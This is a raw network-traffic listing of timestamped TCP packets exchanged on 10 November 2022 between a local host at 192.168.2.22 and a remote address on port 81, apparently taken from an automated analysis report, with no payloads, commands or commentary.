Nov 10, 2022 11:43:14.019295931 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.019423962 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.023063898 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106215954 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106261969 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106276035 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106288910 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106302023 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106319904 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106333017 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106348038 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106364965 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106383085 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106400013 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106419086 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106436968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106455088 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106471062 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106487989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106504917 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106522083 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106540918 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106551886 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106558084 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106551886 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106576920 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106592894 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106592894 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106592894 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106597900 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106621027 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106622934 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106647015 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106666088 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106667042 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106684923 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106703997 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106714010 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106722116 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106740952 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.106748104 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.106784105 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.120829105 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120867968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120886087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120903969 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120920897 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120938063 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120954990 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120973110 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.120974064 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.120974064 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.120991945 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.121016026 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.121030092 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.124073982 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.124102116 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.124160051 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.130332947 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208133936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208209991 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208261013 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208304882 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208347082 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208389044 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208442926 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208456993 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208456993 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208484888 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208503962 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208527088 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208569050 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208579063 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208611012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208651066 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208669901 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208693027 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208734035 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208765030 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208775043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208822012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208827972 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208862066 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208911896 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208913088 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.208954096 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.208996058 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.209003925 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.231823921 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.231903076 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.231951952 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.231995106 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232013941 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232037067 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232050896 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232079029 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232079029 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232122898 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232161045 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232165098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232207060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232244968 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232253075 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232295036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232332945 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232336044 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232377052 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232417107 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232419014 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232466936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232506037 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232510090 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232558966 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232599020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232624054 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232682943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232722044 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232727051 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232769012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232806921 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232810974 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232852936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232891083 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232894897 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232937098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.232974052 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.232978106 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.233019114 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.233062983 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.233064890 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.233112097 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.233154058 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.233163118 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.238292933 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310277939 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310328007 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310347080 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310364008 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310383081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310400009 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310416937 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310434103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310467958 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310486078 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310503006 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310520887 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310538054 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310548067 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310554981 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310549021 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310574055 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310591936 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310591936 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310592890 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310604095 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310612917 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310632944 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.310642004 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310666084 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.310753107 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.334449053 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334496021 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334518909 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334542036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334564924 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334589005 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334614992 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334638119 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334635019 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.334661961 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334677935 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.334677935 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.334686995 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334707022 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.334709883 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.334748030 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.339659929 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339701891 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339726925 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339750051 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339765072 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.339771986 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339795113 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.339796066 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339822054 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339832067 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.339845896 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339869976 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339883089 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.339893103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339915991 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339927912 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.339940071 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339962959 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.339976072 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.339986086 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340009928 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340023041 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.340034008 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340058088 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340070009 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.340081930 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340116978 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.340352058 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340377092 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340399027 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.340415001 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.343874931 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.412147045 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412266016 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412316084 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412348986 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412391901 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412435055 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412476063 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412518978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412559032 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412573099 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.412600994 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412607908 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.412642002 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412666082 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.412683964 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412724972 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412739038 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.412765026 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412806988 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412818909 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.412848949 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412889957 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412903070 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.412931919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412971973 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.412985086 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413012981 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413053989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413067102 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413094997 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413142920 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413157940 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413186073 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413227081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413245916 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413271904 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413316011 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413326979 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413357019 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413398027 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413409948 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413439035 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413480043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413496971 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413522959 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413563967 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413579941 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413605928 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413647890 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413661003 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413688898 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413729906 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413742065 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413773060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413813114 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413825035 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413852930 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413892984 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413906097 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.413934946 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413985968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.413991928 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414047956 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414098978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414113998 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414141893 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414180994 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414194107 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414222002 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414274931 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414290905 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414335012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414375067 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414393902 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414417982 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414458036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414477110 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414499998 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414515972 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414541006 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414581060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414597034 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414624929 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414666891 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414679050 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.414709091 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414752960 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.414764881 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.417387009 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.417840958 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.438604116 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.438702106 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.438889027 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.445319891 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445388079 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445434093 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445477009 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445518017 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445524931 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.445555925 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.445559978 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445601940 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.445604086 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445647955 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.445692062 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.454163074 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.516140938 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516216040 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516261101 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516294003 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516340971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516371965 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516412020 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516412020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.516412020 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.516455889 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516489983 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516520977 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516555071 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.516566038 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516612053 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516640902 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.516654968 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516726971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516767025 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516777039 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.516810894 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516850948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516865969 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.516894102 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516937017 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.516948938 CET	49173	81	192.168.2.22	206.81.11.20
